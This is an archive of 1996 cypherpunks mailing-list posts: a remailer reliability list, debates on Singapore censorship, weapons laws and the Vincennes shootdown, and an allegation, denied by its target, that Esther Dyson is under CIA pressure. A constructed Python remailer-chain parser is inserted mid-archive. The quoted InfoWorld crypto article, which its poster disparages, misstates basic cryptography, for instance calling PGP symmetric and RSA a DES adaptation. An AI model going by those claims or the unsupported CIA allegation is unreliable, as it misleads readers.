r7Y2/opiY139YonF4WsD6IPTMA2Hfip9t8EACu0v2jIvxSCBqwa84WVrAxCijS9t
qfKK8d3Xw9g=
=6tBV
-----END PGP SIGNATURE-----

From rah at shipwright.com Mon Sep 2 08:30:05 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 2 Sep 1996 23:30:05 +0800
Subject: The AI-who???
Message-ID:

An admittedly leftist interpretation of recent Alaskan electoral events, for those fans of the Alaskan Independence Party...

Cheers,
Bob Hettinga

--- begin forwarded text

From: sxaeg at aurora.alaska.edu (GREENWALT ART E) (by way of rah at shipwright.com (Robert A. Hettinga))
To: rah at shipwright.com
Subject: The AI-who???
Organization: University of Alaska Fairbanks
Path: news-central.tiac.net!news-in.tiac.net!uunet!in3.uu.net!brighton.openmarket.com!decwrl!news.alaska.edu!aurora.alaska.edu!sxaeg
Newsgroups: alt.culture.alaska
Date: 29 Aug 1996 01:07:38 GMT
Lines: 35
NNTP-Posting-Host: aurora.alaska.edu
X-Newsreader: TIN [version 1.2 PL2]
X-Newsreader: Yet Another NewsWatcher 2.1.2

Okay, okay...I know everyone has been sitting on the edge of their privy seats wondering how the Rent-A-Party (aka "The Sub-Arctic Titanic of Politics") fared in the recent primaries here in the Interior, so here goes.
Now, keep something in mind as you read these results: the Interior is the heart of the Rent-A-Party. Der Fuhrer Vogel "graced" us with his presence and as the infirmities of advancing age took their toll, he devised the party back in the mid-70's here in the Interior. So...you should think the bastion, the stronghold, Yea, Brethren and Sistren!, the very for-r-r-r-rtress of AIP-ity would be...the INTERIOR! Amen!

The AIP fielded 1 candidate here on the Fairbanks ballots: Paul Chizmar.

He finished last.

Indeed, surpassing even the last performance of the party when they dropped from their 1990 high of 39% of the vote to their 1994 basement 13% of the vote, we now see them seeking subterranean levels as their sole candidate on the entire ballot received *barely* 11% of the vote! Right here! In the Interior! Just about 15 miles from Lynette and Dexter Clarke, the penultimate-Grand Poobahs of Das Partie! Tsk....

I tell ya, folks...I love to watch "Rocky and Bullwinkle", "Monty Python", "The 3 Stooges", the "Little Rascals", etc. But when the AIP finally dwindles/splinters/transmogrifies into its final bit of light and then that little glimmer goes out....I will have lost one of my greatest sources of amusement Alaska has ever offered me. Sigh....

.....Art, who will just have to watch more 3 Stooges and see if he can tell which one is Joe...

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From raph at CS.Berkeley.EDU Mon Sep 2 09:36:11 1996
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Tue, 3 Sep 1996 00:36:11 +0800
Subject: List of reliable remailers
Message-ID: <199609021350.GAA03391@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.
To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = ' alpha pgp';
$remailer{'nymrod'} = ' alpha pgp';
$remailer{"lead"} = " cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = " cpunk pgp hash latent cut";
$remailer{"exon"} = " cpunk pgp hash latent cut ek";
$remailer{"vegas"} = " cpunk pgp hash latent cut";
$remailer{"haystack"} = " cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = " mix cpunk pgp hash latent";
$remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = " cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = " cpunk pgp hash cut ksub reord";
$remailer{'nym'} = ' newnym pgp';
$remailer{"balls"} = " cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = ' alpha pgp';

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver.

The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 2 Sep 96 6:45:14 PDT

remailer  email address                     history       latency  uptime
-----------------------------------------------------------------------
mix       mixmaster at remail.obscura.com   -+++++-+++++  1:38:18  99.98%
jam       remailer at cypherpunks.ca        .*****-+**+*    28:42  99.98%
exon      remailer at remailer.nl.com       ***--**+****     3:33  99.98%
squirrel  mix at squirrel.owl.de            +-+------.+   2:37:06  99.96%
cyber     alias at alias.cyberpass.net      +-+*+**         38:49  99.96%
middle    middleman at jpunix.com           ---- --+++      55:25  99.69%
replay    remailer at replay.com            +* *-**+***      6:15  99.36%
amnesia   amnesia at chardos.connix.com     - -----+---   3:24:36  99.35%
lead      mix at zifi.genetics.utah.edu     +++--+-+++++    48:39  99.23%
winsock   winsock at c2.org                 - -----+--    5:46:31  98.94%
balls     remailer at huge.cajones.com      # **-**+****     5:32  98.70%
nemesis   remailer at meaning.com           ****- ++****    23:48  98.46%
extropia  remail at miron.vip.best.com      -..------     4:55:14  94.02%
haystack  haystack at holy.cow.net          *#* ##+###      10:59  90.11%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk
    A major class of remailers. Supports Request-Remailing-To: field.
eric
    A variant of the cpunk style. Uses Anon-Send-To: instead.
penet
    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp
    Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash
    Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub
    Remailer always kills subject header, even in non-pgp mode.
nsub
    Remailer always preserves subject header, even in pgp mode.
latent
    Supports Matt Ghio's Latent-Time: option.
cut
    Supports Matt Ghio's Cutmarks: option.
post
    Post to Usenet using Post-To: or Anon-Post-To: header.
ek
    Encrypt responses in reply blocks using Encrypt-Key: header.
special
    Accepts only pgp encrypted messages.
mix
    Can accept messages in Mixmaster format.
reord
    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon
    Remailer has been known to monitor contents of private email.
filter
    Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien

From qut at netcom.com Mon Sep 2 09:40:06 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 00:40:06 +0800
Subject: Sharp Knives
In-Reply-To:
Message-ID: <199609021338.GAA29868@netcom21.netcom.com>

! "James A. Donald" , writes:
! >I heard on talk.politics.guns somebody say that in Sweden they
! >had banned knives with a sharp point at the end, and were going
! >to ban sharp knives altogether. I think he was just engaging in
! >hyperbole, that he really meant that gun control in Sweden was
! >unreasonably strict, but on reflection I am not sure.
!
! There is a law in Sweden, some 5 years old, against carrying
! 'dangerous devices' (hunting knives, Ninja stars etc) in 'public
! places' (unless you are a carpenter, electrician or some such
! going about your business). It's okay to carry a knife when
! going fishing/hunting or sitting on your terrace carving totem poles.
! It's only a misdemeanour and might be punished with a fine,
! but usually the cops just use the law to disarmour street gangs
! on the spot. The effects of the law are dubious. Knives have come
! into fashion among teenagers after this legislation (but not as
! a consequence of it, I think).

In California, it's a felony to merely *own* a Ninja star. It's a felony to carry a *concealed* knife, but carrying it openly in a holster is legal.
It's a felony for most people to carry a concealed loaded handgun on the street only on a *second* offense. It's a felony to merely *own* a switchblade, brass knuckles, etc.

Do our weapons laws sound strange? Are many of our weapons laws stricter than countries like Sweden? Yes!

From frogfarm at yakko.cs.wmich.edu Mon Sep 2 10:05:42 1996
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 3 Sep 1996 01:05:42 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <199609021023.UAA09571@suburbia.net>
Message-ID: <199609021354.JAA13057@yakko.cs.wmich.edu>

> Examining in detail Dyson's interests it appears she maintains a
> sizeable and long-standing interest in Eastern European technology
> companies. She is also clearly very far to the right of the political
> spectrum (rampant capitalist would be putting it mildly). She also speaks
> Russian.

And all these would certainly be excellent reasons to denounce her as an enemy of liberty, now wouldn't they.

[CIA snip]

> "Of all tyrannies a tyranny sincerely exercised for the good of its victims
> may be the most oppressive. It may be better to live under robber barons
> than under omnipotent moral busybodies, The robber baron's cruelty may
> sometimes sleep, his cupidity may at some point be satiated; but those who
> torment us for own good will torment us without end, for they do so with
> the approval of their own conscience." - C.S. Lewis, _God in the Dock_

So what's wrong with her being an Evil Capitalist(tm) again?

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
"We think people like seeing somebody in a uniform on the porch." -US Postal spokeswoman, quoted in AP, 1/27/96.
I don't know about you, but most people I know who saw someone in uniform on their porch would pull out the shotgun...
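The listing in Raph Levien's "List of reliable remailers" message above is meant to be read by software: `$remailer{...}` capability strings, a reliability table, and a note on remailers that share a machine or operator. As an added example (not part of the archive and not premail's code), this Python parser reads rows in the form they appear in this archive and picks a chain; the function names and the selection policy (sort by uptime, then latency, at most one remailer per shared group) are assumptions of the example.

```python
import re
from dataclasses import dataclass

# Constructed sample: rows copied from the listing in the archive's form
# (addresses written "user at host", <address> stripped from the caps strings).
CAPS = '''
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"exon"} = " cpunk pgp hash latent cut ek";
$remailer{"haystack"} = " cpunk mix pgp hash latent cut ek";
$remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek";
$remailer{'cyber'} = ' alpha pgp';
'''
STATS = '''
mix mixmaster at remail.obscura.com -+++++-+++++ 1:38:18 99.98%
exon remailer at remailer.nl.com ***--**+**** 3:33 99.98%
squirrel mix at squirrel.owl.de +-+------.+ 2:37:06 99.96%
cyber alias at alias.cyberpass.net +-+*+** 38:49 99.96%
replay remailer at replay.com +* *-**+*** 6:15 99.36%
haystack haystack at holy.cow.net *#* ##+### 10:59 90.11%
'''
GROUPS = "(cyber mix)"

CAP_RE = re.compile(r"""\$remailer\{(["'])(\w+)\1\}\s*=\s*(["'])(.*?)\3;""")
STAT_RE = re.compile(
    r"^(\S+)\s+(\S+) at (\S+)\s+(.*?)\s+((?:\d+:)?\d+:\d\d)\s+(\d+(?:\.\d+)?)%$")


@dataclass
class Remailer:
    name: str
    caps: set
    short_key_id: bool = False   # "pgp." : use the short name as PGP key ID
    address: str = ""
    history: str = ""            # one symbol per ping day; may contain blanks
    latency: int = None          # seconds
    uptime: float = None         # percent


def to_seconds(text):
    """'1:38:18' -> 5898, '3:33' -> 213 (read as [h:]m:s, an assumption)."""
    total = 0
    for part in text.split(":"):
        total = total * 60 + int(part)
    return total


def load(caps_text, stats_text):
    """Merge the capability lines and the reliability table by short name."""
    remailers = {}
    for m in CAP_RE.finditer(caps_text):
        value = re.sub(r"<[^>]*>", " ", m.group(4))   # drop address if present
        tokens = value.split()
        caps = {t.rstrip(".") for t in tokens}
        remailers[m.group(2)] = Remailer(m.group(2), caps, "pgp." in tokens)
    for line in stats_text.splitlines():
        m = STAT_RE.match(line.strip())
        if not m or m.group(1) not in remailers:
            continue                                   # header, rule, unknown
        r = remailers[m.group(1)]
        r.address = m.group(2) + "@" + m.group(3)
        r.history = m.group(4)
        r.latency, r.uptime = to_seconds(m.group(5)), float(m.group(6))
    return remailers


def parse_groups(text):
    """'(cyber mix)' -> [{'cyber', 'mix'}]"""
    return [set(g.split()) for g in re.findall(r"\(([^)]*)\)", text)]


def slow_days(r):
    """Days where the reply took more than a day ('.') or came too late ('_')."""
    return sum(r.history.count(c) for c in "._")


def pick_chain(remailers, need, groups=(), length=3,
               min_uptime=99.0, max_latency=4 * 3600):
    """Most reliable remailers offering every capability in `need`, taking
    at most one remailer from each shared machine/operator group. Entries
    with no row in the reliability table (never measured) are skipped."""
    ok = [r for r in remailers.values()
          if need <= r.caps and r.uptime is not None
          and r.uptime >= min_uptime and r.latency <= max_latency]
    ok.sort(key=lambda r: (-r.uptime, r.latency))
    chain = []
    for r in ok:
        clash = any(r.name in g and any(c in g for c in chain) for g in groups)
        if not clash:
            chain.append(r.name)
        if len(chain) == length:
            break
    return chain


if __name__ == "__main__":
    table = load(CAPS, STATS)
    print(pick_chain(table, {"mix", "pgp"}, parse_groups(GROUPS)))
    print(pick_chain(table, {"pgp"}, parse_groups(GROUPS)))
```

With only `pgp` required, `cyber` is passed over because `mix` (same group) is already in the chain; `flame` never qualifies because it has capabilities but no measured uptime.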
From grafolog at netcom.com Mon Sep 2 11:14:01 1996
From: grafolog at netcom.com (jonathon)
Date: Tue, 3 Sep 1996 02:14:01 +0800
Subject: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609020913.TAA11331@jagumba.anu.edu.au>
Message-ID:

On Mon, 2 Sep 1996, James Seng wrote:

> You don't go to jail for writing articles. You might be sued for defamation
> if you published something untrue (similar to your civil lawsuit i guess?)

So what happens if somebody in Singapore publishes a list of Singaporeans who beat up Chinese immigrants the previous week.

> and have to pay large sum of money to the person but you don't go to jail.

If the person who publishes the list of Singaporeans who beat up Chinese immigrants the previous week is not in jail for publishing that, then what is he in jail for? The individual is publishing factual data, just data that the Singapore government has been trying very hard to keep out of the hands of the population of Singaporeans in specific, and the world in general.

> >a government that can keep the leader of an opposition political party
> >in jail for years just because he opposes them is pretty corrupt.
> I am not interested in politics so i didn't really know what is happening in
> that case. for that, i have no comment.

IOW, you don't give a damn about freedom of speech -- which is what I suspected was the case all along. You're just one of those people who says pretty words, without meaning them.

> Very true. So does the First Amendment said. Singapore does have such
> similar law as First Amendment which is slight "modified". You have freedom
> of speech as long as your comments does not endanger religious/racist
> harmony and national security. (I do not know the exact term..need a lawyer

National security is a hole that makes a mockery of anything which allegedly protects freedom of speech.
The slight modification in Singapore's freedom of speech law means that all speech is acceptable, so long as the writer first self-censors, and secondly doesn't offend any jerks in Singapore, and thirdly doesn't offend any jerks in the neighbouring countries, and fourthly doesn't offend the current despot in Singapore.

<< A statement which makes this message illegal to carry through the internet. >>

Still want to claim that Singapore practices freedom of speech? Or do you want me to start citing religious, political and serious literary works of merit that are prohibited under Singapore's alleged freedom of speech statute, that bans any speech that might be controversial?

xan

jonathon
grafolog at netcom.com

However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all. Bill Stewart

From tbyfield at panix.com Mon Sep 2 11:19:16 1996
From: tbyfield at panix.com (tbyfield at panix.com)
Date: Tue, 3 Sep 1996 02:19:16 +0800
Subject: American Imperialism, Firing Squads, and the Vincennes Shootdown
In-Reply-To:
Message-ID: <199609021514.LAA12830@mail2.panix.com>

Timothy C. May) wrote:

> At 1:03 AM 9/2/96, Alan Horowitz wrote:
> >The Aegis ship in the Gulf was not in an exercise. It was in a war zone.
> >
> >If my memory serves, the Iranian jetliner had its squawker turned off, or
> >broken. The officer in charge in the CIC had about ten seconds to decide
> >if he was about to be locked-on by a missile. And no real information to
> >make the decision with.
>
> The U.S.S. Vincennes shot down an Iranian commercial airliner that was in
> its normal and well-known flight path out of Bandar Abbas.
<...>
>
> As to the "squawker" being turned off, this is not my recollection of the
> case (though it was nearly a decade ago, so memories fade...).

If memory serves, the disinfo campaign following the Airbus incident put much emphasis on the plane's (allegedly) erratic, seemingly hostile behavior: it was said to be menacing a specific US ship in the convoy. It later turned out, I think, that the ship being menaced was a radar ghost fabricated by the Vincennes's AEGIS system.

From frissell at panix.com Mon Sep 2 11:33:28 1996
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 3 Sep 1996 02:33:28 +0800
Subject: PLEASE Nuke Singapore Back into the Stone Age
Message-ID: <2.2.32.19960902151654.00abd6ac@panix.com>

At 05:51 PM 9/1/96 -0700, Timothy C. May wrote:

>Who says this has anything to do with "American ideology"? The Usenet is
>propagated around the world. All we are saying is that honest commentary on
>the corruption of Lee Kwan Yew (and his billion dollars in Australian and
>European banks) will be reported on the Usenet.
>
>This is not "imposing American ideology" on anyone.

Didn't you know that TCP/IP was an attempt by American Intelligence Agencies in concert with Britain to impose Anglo-American values (free trade in goods and bits) on the poor Mittel Europeans and the followers of Confucius in the East. These sinister British-American conspirators had done so well with their earlier releases of blue jeans, Rock and Roll, and Coca Cola. TCP/IP was designed to be the final blow to Central Europe and Asia in a culture war that has dominated this century.

Pretty sneaky those Anglo Saxons.

DCF

"Course if Mittel Europeans and Confucians hadn't murdered 100 million people or so in the 20th century, perhaps we could feel sorry for them." (The US-UK alliance only murdered a few million mostly via mass bombing of civilians during WWII.)
From edyson at edventure.com Mon Sep 2 11:39:37 1996
From: edyson at edventure.com (Esther Dyson)
Date: Tue, 3 Sep 1996 02:39:37 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <19960902152515012.AAA179@Esther.edventure.com>

At least you don't accuse me of being a Communist. For the record, I am not a tool of the CIA nor have they pressured me, but there's no reason for you to believe me.

Esther Dyson

At 08:23 PM 9/2/96 +1000, Julian Assange wrote:

SNIP ---
>
>Examining in detail Dyson's interests it appears she maintains a
>sizeable and long-standing interest in Eastern European technology
>companies. She is also clearly very far to the right of the political
>spectrum (rampant capitalist would be putting it mildly). She also speaks
>Russian. I'm not saying she has been working for the CIA for the past
>decade, but I would be very surprised if the CIA has not exerted quite
>significant pressure (which they are easily able to do given the
>location of many of Dyson's assets) in order to bring her into their
>folds during that time period.
>
>--
>"Of all tyrannies a tyranny sincerely exercised for the good of its victims
> may be the most oppressive. It may be better to live under robber barons
> than under omnipotent moral busybodies, The robber baron's cruelty may
> sometimes sleep, his cupidity may at some point be satiated; but those who
> torment us for own good will torment us without end, for they do so with
> the approval of their own conscience." - C.S. Lewis, _God in the Dock_
>+---------------------+--------------------+----------------------------------+
>|Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union |
>|proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = |
>|proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
>+---------------------+--------------------+----------------------------------+
>

Esther Dyson Always make new mistakes!
EDventure Holdings
1 (212) 924-8800
1 (212) 924-0240 fax
104 Fifth Avenue
New York, NY 10011 USA
www.edventure.com

High-Tech Forum in Lisbon, October 27-29, 1996
PC Forum in Tucson, Arizona, March 23-26, 1997

From cmcurtin at research.megasoft.com Mon Sep 2 11:39:57 1996
From: cmcurtin at research.megasoft.com (C Matthew Curtin)
Date: Tue, 3 Sep 1996 02:39:57 +0800
Subject: Terrible story on crypto in InfoWorld
Message-ID: <199609021327.JAA06854@goffette.research.megasoft.com>

There's a story covering crypto in this week's InfoWorld Electric. Since it's a members-only thing, I'll include the text here, as well as my response to it. I'm hoping that they'll take the article down and take up my offer to provide a better replacement.

I suspect that the problem here is that someone was given a subject and a deadline, and told to "go for it." The requisite background for getting clued on crypto is probably significantly longer than the amount of time allowed by the deadline. I suspect that the issue was further clouded by the crypto-clued people she talked to during the research speaking directly about what they're doing, without giving any sort of analogies to make the ideas click and make sense. I hope that my illustration of the bicycle lock serves to clear up the confusion...

In any event, we've all got a lot of work to do. I think we should take it upon ourselves to not only talk about crypto and why it's such a Good Thing(tm), but also to *educate* people to help them understand what in the world we're talking about.
-matt

------------------------ begin silly article -------------------------

Encryption technology can help secure private data over public carriers, but tackling its own issues is another story

By Julie Bort
InfoWorld Electric

Think about this: Every time one of your end-users sends an electronic communication from your network, it opens the door to an attack. It is unbelievably easy for a knowledgeable hacker to exploit the failings of SMTP and other communications protocols to eavesdrop on Internet e-mail, send phony messages, or even gain access to other networked systems, security consultants say. A domain name or single IP address is the only information needed, and from there the door is wide open for other mischief.

One increasingly popular way to plug this gaping hole is to encrypt e-mail and other electronic communications. Encryption is a way to encode text using complex mathematical algorithms.

"When explaining encryption, I like to use the analogy of the Cap'n Crunch Super Secret Decoder Rings. These rings [distributed in Cap'n Crunch cereal boxes in the 1960s] contained a very simple algorithm. It was something like `take a letter then add 5.' So an A became an F. Simply speaking, that's all these algorithms are, mathematical formulas," explains Gary Fresen, a member of the American Bar Association's committee on digital signatures and an attorney and partner at Baker McKenzie LLP, in Chicago, one of the world's largest law firms.

Although no encryption algorithm is in and of itself crack-proof, several of them are so complex that they are virtually unbreakable. Coupled with proper implementation, authentication, and secure connections, encryption solutions can add a high level of security to any company's arsenal.
However, it is an area that requires a knowledgeable person to make the purchasing decision because the technology is very complex, the best product selected will add a level of administration overhead, and numerous industry consortiums are developing competing APIs.

NUMEROUS USES.

Is encryption security overkill? Absolutely not, say users who have already adopted it or are in the process of adopting it. One reason is to gain some security control over public telecommunications lines used in wide area networks.

"We have a good idea of our internal security, but we also use the public carriers for our worldwide WAN, such as CompuServe [Inc.'s] frame relay and British Telecom [Plc.'s] frame relay, and we [don't control] their level of security," says Richard Perlotto, corporate network security manager for VLSI Technology Inc., in Tempe, Ariz.

"Even if you own most of your own equipment, with frame relay you don't own the router, the carrier does. Frequently [the carrier has] modems attached to those routers to manage the equipment remotely," Perlotto adds.

Those modems can allow hackers to tap in and grab data as it is being transmitted, without ever being detected by the company's security systems. Consequently, VLSI is currently evaluating encryption boxes and other products that sit on either end of a connection, such as NetFortress from Digital Secured Networks Technology Inc. (DSN), in Englewood Cliffs, N.J. One box encodes all traffic on the fly when it's being transmitted, and the other decodes the information upon receipt. Router vendors offer similar add-ons.

Besides simply letting employees sleep better at night with the knowledge that their corporate secrets are safe, encryption technology can mean that a company can operate more efficiently and cost-effectively, users say.

"Right now, we drop letters into the post office, which isn't very secure when you think about it," Fresen says. "After all, anyone could look at them. Or we send a courier.
But if we can secure our [Lotus Development Corp.] cc:Mail system, there's a tremendous cost savings to us compared to sending a courier to Hong Kong three times a day. And we'll be able to do things in a day that used to take a week."

Fresen is currently testing Entrust 2.0 from Northern Telecom Ltd. (NorTel), in Research Triangle Park, N.C., as an encryption add-on to e-mail.

GETTING KEYED IN.

But before you can go out and purchase an encryption system, you need to do some serious homework. Encryption involves multiple technologies, competing protocols, and complex mathematics.

You can start the learning process by understanding the two components that make up most encryption systems: the key and the certificate.

The key is the algorithm or mathematical formula that encodes the message itself. It must be sent to the message recipient so the message can be decoded, hence the term key. The size of the key, measured in bits, determines how complex the algorithm is and how tough the code is to crack. The state of the art for encryption technology used exclusively within the United States is 1,024 bits. However, the maximum size key that is allowed to be exported is 40 bits.

Keys come in two flavors: symmetrical, or public key model; and asymmetrical, or public key/private key model.

A symmetrical key uses the same algorithm to encode and decode a message. This is the technique used by the public key encryption program Pretty Good Privacy (PGP). PGP assumes what security experts call the peer trust model. That is, the sender knows and trusts the receiver and is therefore perfectly comfortable in sending the key on its way. Herein lies the "pretty good" part of the privacy. Although the algorithm itself makes the message difficult to crack, the key exchange is only pretty good when compared with other methods. On the other hand, the great advantage to PGP is that it creates no key management overhead, which is the biggest drawback of asymmetrical keys.
In the asymmetrical model, users have a public key stored somewhere that is available. Should someone want to send an encrypted message, the sender locates the public key of the recipient, encodes the message, and sends it off. The receiver then uses a private key to decode the message. The private key is different from the public key, but they are mathematically linked so that the private key is capable of decoding the message.

Asymmetrical systems require no trust between the sender and the recipient. That's good. But they do create administration overhead in the form of storing and maintaining public and private keys.

Public/private key exchange is the technique used by RSA Data Security Inc., which was recently sold to Security Dynamics Inc., in Bedford, Mass. RSA uses a technology that is actually an adaptation of the decade-old National Institute of Standards and Technology's peer-trust Data Encryption Standard (DES), still used in many products. DES is a method of grabbing random keys for each encryption task, rather than using the same key repeatedly.

Cryptographers say that RSA solves some problems, such as the trust issue but generates others.

"Say I want to send a secure message. The first thing I do is take a random key and encrypt the message with it," says Paul Kocher, an independent cryptography consultant in Menlo Park, Calif., and one of the people responsible for discovering the flaw in the security of Netscape Communication Corp.'s Netscape Navigator.

"But without that key, I won't know how to decode [the message], so I take an RSA public key and encrypt the random DES key with my recipient's public key. The recipient uses a private RSA key to decrypt the DES key. If it sounds convoluted, it is. RSA is very slow and cumbersome. DES is fast and efficient, but it doesn't give you the security of the public/private key system," Kocher explains.
RSA remains one of the most well-known encryption technologies, but it is not, by far, the only public/private key exchange method currently in use. For example, other vendors use a competing version called Diffie-Hellman. It is a mathematically different implementation of the asymmetrical model, and it is the method employed by DSN's NetFortress.

THE REAL YOU.

Using public or public and private keys is the foundation of encryption, but keys can't verify a recipient's identity.

"When you're talking about sending secured messages, there are two goals you've got. One is to make sure that the information stays confidential, and the other is that it does not get tampered with," Kocher says.

Enter the certificate, also called the digital signature. Certificates act like an electronic driver's license. They authenticate that the receivers and senders are who they say they are.

"The issue is trust. When we owned our own 3270 cabling, we trusted it, we worried less. Now I have someone at Daytona Co. that needs access to Chrysler Corp. across multiple networks. What sort of trust do I have?" asks Bob Maskowitz, technical support specialist for Chrysler, in Detroit, and a member of the Internet Architecture Board of the Internet Engineering Task Force (IETF). "I need to authenticate that this person is allowed to update [a document]."

Certificates can be created and managed by a third party, such as VeriSign Inc., in Mountain View, Calif., or they can be created and managed internally, with products such as NorTel's Entrust, which also performs encryption.

Once a certificate is obtained, it becomes the user's digital signature. When digitally signing something, the recipient of the signature gets all of the information contained on the certificate, such as who the person is, the person's address, or other items chosen to be included on the certificate. The digital signature also says who granted the certificate, when it expires, and what level of verification was done.

"There are three classes of certificates," explains Gina Jorasch, director of product marketing for VeriSign. "In Class 1, we check for a unique name, that the e-mail address is correct, and that the person receiving it has authority to access that e-mail account. In Class 2, we check the name, address, driver's license, social security number, and date of birth. For a Class 3 we check all of those things, plus we check against the Equifax [credit reporting bureau] database."

Although certificates provide the invaluable service of authenticating users, organizations that care enough about their security to use encryption and certificates may not want to trust an outsider to handle them, according to users.

"Do you think Ford [Motor Co.] or Chrysler is going to let someone else control their certificates? Then there is this issue of where did you get your certificate from? Am I going to let you query my database to get a key? No way," Maskowitz says.

From a network management perspective, certificates are also an issue. Unless they are outsourced, they will add a significant amount of system management overhead to an encryption system, even with systems such as Entrust that include management features. Most certificates are set to expire in a set amount of time, such as a year. Someone will have to see that they get reissued. Someone will also have to make sure that certificates for employees who leave a company are revoked and that new employee certificates are issued.

SMIME'S THE WORD.

The final area of concern IS managers face is the new wave of protocols being spewed out by various industry consortiums. Numerous APIs are being created that cover all the aspects of using encryption. Although these APIs are posing as standards, in truth the two most popular APIs for the commercial sector are merely vehicles for the mass adoption of a particular company's key technology. Nevertheless, vendors of products such as e-mail packages are lining up behind them.
The four big protocols being worked on are Secure Multipurpose Internet Mail Extensions (SMIME), Multipart Object Security Standard (MOSS), the next-generation version of PGP that allows asymmetrical key exchange, and Message Security Protocol, says Rik Drummond, chairman of the IETF's electronic data interchange over the Internet committee and president of The Drummond Group, a consultancy in Fort Worth, Texas, that helps corporations choose and implement networking and security systems. MOSS is the API for the Department of Defense, and it will be mandatory for anyone in the government or anyone who does business with it. But commercially, SMIME and PGP, Version 3.0, are more robust choices, Drummond says, and they offer features best-suited for the commercial sector, such as backward compatibility, and better key and certificate management capabilities. By far the biggest names in the Internet world have lined up behind SMIME, including Microsoft Corp., which intends to make Microsoft Exchange SMIME-compliant; Netscape; and Qualcomm Inc., maker of the Eudora e-mail package. That makes it a comforting set of protocols to choose because corporations that buy products with SMIME or that purchase SMIME toolkits for customer applications will know that they will be able to communicate with the vast majority of others through a de facto standard. Those using other protocols will be left talking to themselves. Still, SMIME, as it stands now, isn't a panacea. Among its problems is that "the signature is exposed outside the encryption envelope," Maskowitz says. Also, once a message is encrypted with someone else's public key, the sender of the message can't open the message to make changes, Maskowitz adds. The architects of SMIME haven't completed the APIs yet, so there is some possibility that these problems will be fixed but in all likelihood not in time to be included in the first crop of SMIME-compliant applications, due to start rolling out this fall. 
